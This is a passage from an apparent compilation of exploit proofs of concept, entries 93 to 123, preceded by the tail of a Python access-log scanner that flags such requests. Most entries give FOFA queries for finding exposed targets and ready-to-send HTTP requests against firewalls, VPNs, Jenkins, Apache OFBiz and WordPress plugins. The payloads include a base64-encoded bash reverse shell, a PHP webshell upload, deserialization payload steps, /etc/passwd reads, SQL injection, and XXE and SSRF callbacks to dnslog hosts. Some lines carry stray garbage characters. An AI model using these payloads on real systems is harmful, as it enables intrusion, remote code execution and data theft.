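    return re.sub(r";[^/]*", "", path).lower(), query


def decoded_sql_param(query):
    """Entry 60 ships its statement base64-encoded in sql=; return it decoded, else None."""
    m = re.search(r"(?:^|&)sql=([^&]+)", query)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def scan_line(line):
    """Findings for one access-log line; an empty list when nothing matches."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, query = normalize(m.group("target"))
    def hit(rule, level, detail):
        return {"rule": rule, "level": level, "ip": m.group("ip"), "detail": detail}
    hits = []
    for name, path_re, query_re in COMPILED:
        if not path_re.search(path):
            continue
        if query_re is None:
            hits.append(hit(name, "indicator", "payload is in the POST body; confirm from WAF/app logs"))
        elif query_re.search(query):
            hits.append(hit(name, "attempt", decoded_sql_param(query) or query[:120]))
    for name, rx in GENERIC_RULES:
        if rx.search(query) or rx.search(path):
            hits.append(hit(name, "attempt", query[:120]))
    return hits


def scan_log(text):
    """Flat list of findings for a whole log file's text."""
    return [h for line in text.splitlines() for h in scan_line(line)]


# Constructed sample lines modelled on the requests above (not real traffic).
SAMPLE_LOG = r"""
10.0.0.5 - - [05/Jun/2024:10:00:01 +0800] "GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1" 500 1203 "-" "Mozilla/5.0"
10.0.0.5 - - [05/Jun/2024:10:00:02 +0800] "GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.6 - - [05/Jun/2024:10:00:03 +0800] "GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 88 "-" "curl/7.88.1"
10.0.0.6 - - [05/Jun/2024:10:00:09 +0800] "GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1" 200 2311 "-" "curl/7.88.1"
10.0.0.7 - - [05/Jun/2024:10:00:10 +0800] "POST /cgi-bin/network_test.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
10.0.0.7 - - [05/Jun/2024:10:00:11 +0800] "GET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20x%20%3E%3E%20/usr/local/webui/t.php%0a HTTP/1.1" 200 10 "-" "Mozilla/5.0"
10.0.0.8 - - [05/Jun/2024:10:00:12 +0800] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2024:10:00:13 +0800] "GET /goform/webRead/open/?path=|id HTTP/1.1" 200 64 "-" "Mozilla/5.0"
10.0.0.9 - - [05/Jun/2024:10:00:14 +0800] "GET /cgi-bin/main-cgi?json={\x22cmd\x22:255,\x22szUserName\x22:\x22\x22,\x22u32UserLoginHandle\x22:-1} HTTP/1.1" 200 300 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f'{h["level"]:9} {h["ip"]:10} {h["rule"]}: {h["detail"]!r}')
```

Replace SAMPLE_LOG with the contents of a real access.log; each finding carries the source IP, the rule and the decoded query, so the output can go straight into a SIEM lookup. Normalising before matching is the part that matters: a rule written against the raw request line would miss every ";.js", ".js%70" and "..;/" variant, which is precisely why those suffixes are in the payloads.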

93. Qi An Xin (奇安信) Wangshen (网神) SecGate 3600 firewall app_av_import_save arbitrary file upload
FOFA: fid="1Lh1LHi6yfkhiO83I59AYg=="
The import handler stores the upload under /attachements/ with its original name, so the file is fetched back from there.
POST /?g=app_av_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
Content-Type: text/plain

wagletqrkwrddkthtulxsqrphulnknxa
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarykcbkgdfx
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarykcbkgdfx--

GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

94. Qianxin Wangshen SecGate3600 firewall obj_area_import_save arbitrary file upload
FOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
POST /?g=obj_area_import_save HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36

------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10000000
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"
Content-Type: text/plain

pxplitttsrjnyoafavcajwkvhxindhmu
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="submit_post"

obj_app_upfile
------WebKitFormBoundarybqvzqvmt
Content-Disposition: form-data; name="__hash__"

0b9d6b1ab7479ab69d9f71b05e0e9445
------WebKitFormBoundarybqvzqvmt--


GET /attachements/xlskxknxa.txt HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36

95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
CVE-2023-49070
FOFA:app="Apache_OFBiz"
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

<?xml version="1.0"?>
<methodCall>
  <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>
  <params>
    <param>
      <value>
        <struct>
          <member>
            <name>test</name>
            <value>
              <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[base64 value of the payload]</serializable>
            </value>
          </member>
        </struct>
      </value>
    </param>
  </params>
</methodCall>

Generate the payload with ysoserial:
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"

Substitute the generated payload into the POC above:
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Content-Length: 889
Content-Type: application/xml
Accept-Encoding: gzip

PAYLOAD

96. Apache OFBiz 18.12.11 groovy remote code execution
FOFA:app="Apache_OFBiz"
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 55

groovyProgram=throw+new+Exception('id'.execute().text);

Reverse shell
Start a listener on Kali:
nc -lvp 7777

POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
Host: 192.168.40.130:8443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast Yingkeshi HD intelligent recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D

100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php

2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

- C, q3 W% q: |! k* q2 xSAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 encoding of the following XML document:
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content-Length: 41
Accept: application/json,text/javascript,*/*;q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding: gzip,deflate
Accept-Language: zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: <replace with your own token>
Connection: close

108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163

b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'$ `' i9 S$ A/ }+ V: o2 O0 D# e

POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

111. WordPress Plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

112. WordPress Plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

5 z, K% d$ A5 J: {$ c{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}

113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
" _- g4 z/ X6 `, n4 b! \. zGET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--

117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
  l9 c( W7 s( x7 z  v1 I# b& @GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1. V+ w" L$ m/ H9 w
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--

Then access /home/src.php

119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in first; the default credentials are admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

# @! t& y' G' _+ F9 msrc=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Baichuo Smart S40 management platform web.php import arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328

File path: /upload/2.php

121. Beijing Baichuo (百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


boot/web/upload/weblogo/1.php

122. Beijing Baichuo (百绰) Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; in clear text it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
